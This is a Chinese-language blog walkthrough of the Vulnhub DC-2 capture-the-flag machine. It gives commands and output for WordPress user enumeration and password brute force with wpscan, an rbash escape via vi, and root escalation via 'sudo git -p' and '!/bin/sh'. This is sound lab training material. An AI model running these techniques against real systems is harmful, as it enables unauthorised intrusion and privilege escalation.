天道酬勤

【Vulnhub】— DC-2

主机发现

老样子,还是使用netdiscover

找到其IP为192.168.234.177

端口扫描

使用Nmapnmap -Pn -A 192.168.234.177

root@kali:~# nmap -Pn -A 192.168.234.177
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-05 23:36 CST
Nmap scan report for 192.168.234.177
Host is up (0.00042s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:23:FE:58 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.234.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.77 seconds

可以看到目标主机开启了80端口,我们直接使用IP访问。

发现不可以访问,并且返回http://dc-2/

这个地方呢,我们需要修改hosts文件,实现本地域名解析。

hosts文件地址:C:\Windows\System32\drivers\etc\hosts

修改如下即可:IP+[空格]+域名

现在我们就可以成功访问了,是一个Wordpress站点。

Flag1

找到了flag1,就在站点首页

Flag1告诉我们要使用工具Cewl,该工具是Kali Linux字典生成工具。

Flag2

Cewl使用

看一下Cewl的用法:

root@kali:~# cewl -h
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>

    OPTIONS:
	-h, --help: Show help.
	-k, --keep: Keep the downloaded file.
	-d <x>,--depth <x>: Depth to spider to, default 2.
	-m, --min_word_length: Minimum word length, default 3.
	-o, --offsite: Let the spider visit other sites.
	--exclude: A file containing a list of paths to exclude
	-w, --write: Write the output to the file.
	-u, --ua <agent>: User agent to send.
	-n, --no-words: Don't output the wordlist.
	--with-numbers: Accept words with numbers in as well as just letters
	-a, --meta: include meta data.
	--meta_file file: Output file for meta data.
	-e, --email: Include email addresses.
	--email_file <file>: Output file for email addresses.
	--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
	-c, --count: Show the count for each word found.
	-v, --verbose: Verbose.
	--debug: Extra debug information.
      
	Authentication
	--auth_type: Digest or basic.
	--auth_user: Authentication username.
	--auth_pass: Authentication password.
      
	Proxy Support
	--proxy_host: Proxy host.
	--proxy_port: Proxy port, default 8080.
	--proxy_username: Username for proxy, if required.
	--proxy_password: Password for proxy, if required.
      
	Headers
	--header, -H: In format name:value - can pass multiple.
      
    <url>: The site to spider.

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

使用命令cewl -v http://dc-2/ -w dict.txt,对网站进行爬去,并生成密码保存在当前目录下的dict.txt文件中。

Cewl的详细用法

查看生成的密码:

紧接着开始密码,爆破本以为admin就可以的,没想到无果。这是一个Wordpress站点,我们可以使用wpscan扫描站点的用户。

wpscan使用

wpscan --url http://dc-2/ --enumerate u扫描wordpress站点用户,得到三个用户分别为:

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

另外还有两个常用的命令

wpscan --url http://dc-2/ --enumerate vp扫描插件中的漏洞

wpscan --url http://dc-2/ --enumerate vt扫描主题中的漏洞

wpscan爆破密码

wpscan --url http://dc-2/ --passwords /root/dict.txt --usernames admin,jerry,tom

关于wpscan的教程,还是得使用命令wpscan --hh查看所有的用法,因为wpscan会更新,网上的教程不一定合适了。

最终我们得出两个密码是可以登录的

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                            [SUCCESS] - tom / parturient   

在jerry账户的文章里发现了Flag2:

Flag3

If you can’t exploit WordPress and take a shortcut, there is another way.Hope you found another entry point.

如果你不能利用WordPress并抄近路,还有别的办法。希望你能找到另一个切入点。

也就是说我们得另想一个办法,不能只从wordpress下手。想到扫描的端口中,只开放了80端口,感觉有点不大对,感觉肯定隐藏了一些端口,于是我再用Nmap全扫一遍。

root@kali:~# nmap -sV -Pn -p 1-65535 192.168.234.177 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 14:00 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.177
Host is up (0.00053s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: WordPress version: 2 
|   /wp-includes/images/rss.png: WordPress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: WordPress version 2.5 found.
|   /wp-includes/images/blank.gif: WordPress version 2.6 found.
|   /wp-includes/js/comment-reply.js: WordPress version 2.7 found.
|   /wp-login.php: WordPress login page.
|   /wp-admin/upgrade.php: WordPress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.10 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_https-redirect: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.10: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-2161	5.0	https://vulners.com/cve/CVE-2016-2161
|     	CVE-2016-0736	5.0	https://vulners.com/cve/CVE-2016-0736
|     	CVE-2014-3583	5.0	https://vulners.com/cve/CVE-2014-3583
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2015-3185	4.3	https://vulners.com/cve/CVE-2015-3185
|     	CVE-2014-8109	4.3	https://vulners.com/cve/CVE-2014-8109
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|_    	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:23:FE:58 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.85 seconds

可以看到开放了7744端口,是个ssh服务。使用ssh连接:

连接上了。

就在当前目录下,执行ls,发现了Flag3。

利用cat查看flag3.txt,却报错。

flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

什么是rbash?

受限shell是LinuxShell限制一些bash shell中的功能,并且是从名字上很清楚。 该限制很好地实现了命令以及脚本在受限shell中运行。 它为Linux中的bash shell提供了一个额外的安全层。

但是rbash禁用了vim,没有禁用vi,于是我就用vi打开了,得到flag3:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。

也许我们需要利用jerry的账号进行提权.

然后用破解的jerry账号密码登录,发现登不上。。。

结果只好返回tom账号了,尝试切换账号,发现真的是啥也运行不了。

绕过rbash

利用vi

vi
:set shell=/bin/bash       //输入完之后回车,然后再输入下一行
:shell        //输入完再回车
…………………………此时已经从vi界面返回到命令行界面了,再输入
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL
绕过成功。

Flag4

此时,我们可以使用任何命令了

tom@DC-2:/$ cd home
tom@DC-2:/home$ ls
jerry  tom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

 

Flag5

flag4中给了提示,要使用git进行提权。

使用sudo -l查看用户权限

发现tom没有这个权限,那么就切换到jerry用户。

使用破解的jerry账号和密码,切换到了jerry用户。

再次使用sudo -l

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

这句话的意思呢?就是jerry用户可以在没有root密码的情况下运行git,以root身份运行git。

jerry@DC-2:~$ sudo git -p
usage: git [--version] [--help] [-C <path>] [-c name=value]
           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
           <command> [<args>]

The most commonly used git commands are:
   add        Add file contents to the index
   bisect     Find by binary search the change that introduced a bug
   branch     List, create, or delete branches
   checkout   Checkout a branch or paths to the working tree
   clone      Clone a repository into a new directory
   commit     Record changes to the repository
   diff       Show changes between commits, commit and working tree, etc
   fetch      Download objects and refs from another repository
   grep       Print lines matching a pattern
   init       Create an empty Git repository or reinitialize an existing one
   log        Show commit logs
   merge      Join two or more development histories together
   mv         Move or rename a file, a directory, or a symlink
   pull       Fetch from and integrate with another repository or a local branch
   push       Update remote refs along with associated objects
   rebase     Forward-port local commits to the updated upstream head
   reset      Reset current HEAD to the specified state
   rm         Remove files from the working tree and from the index
   show       Show various types of objects
   status     Show the working tree status
   tag        Create, list, delete or verify a tag object signed with GPG
   
   'git help -a' and 'git help -g' lists available subcommands and some
concept guides. See 'git help <command>' or 'git help <concept>'
to read about a specific subcommand or concept.
!/bin/sh      //获取一个交互shell。
# whoami
root
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 


git-p的意思就是以分页的形式展示git的帮助信息。

 

 

赞(2) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】— DC-2
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏